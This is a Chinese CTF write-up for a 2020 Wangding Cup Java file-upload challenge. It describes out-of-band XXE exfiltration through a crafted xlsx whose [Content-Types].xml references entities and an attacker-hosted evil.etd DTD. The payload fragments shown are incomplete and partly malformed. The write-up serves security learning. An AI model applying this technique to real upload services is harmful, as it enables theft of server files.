2020网鼎杯---Java文件上传wp

前言

一篇文章读懂Java代码审计之XXE看过我这篇博客应该不难,没看过建议在看看。


题解

下载了所有的class发现需要上传xlsx poi
开头必须是execl
在这里插入图片描述

  • 新建execl
    -1.xlsx文件,修改后缀名execl
    -1.xlsx.zip解压。
    2020网鼎杯---Java文件上传wp_第1张图片

  • 修改[Content-Types].xml



%remote;
%all;
]>
<root>&send;root>

2020网鼎杯---Java文件上传wp_第2张图片

  • 重新打包成excel-1.xlsx,文件名一定不能错。

  • 在服务器上新建一个evil.etd文件。
    2020网鼎杯---Java文件上传wp_第3张图片

<!ENTITY % all "">

  • 然后直接上传,查看服务器http记录。

在这里插入图片描述

2020网鼎杯---Java文件上传wp_第4张图片

你可能感兴趣的:(安全,漏洞分析)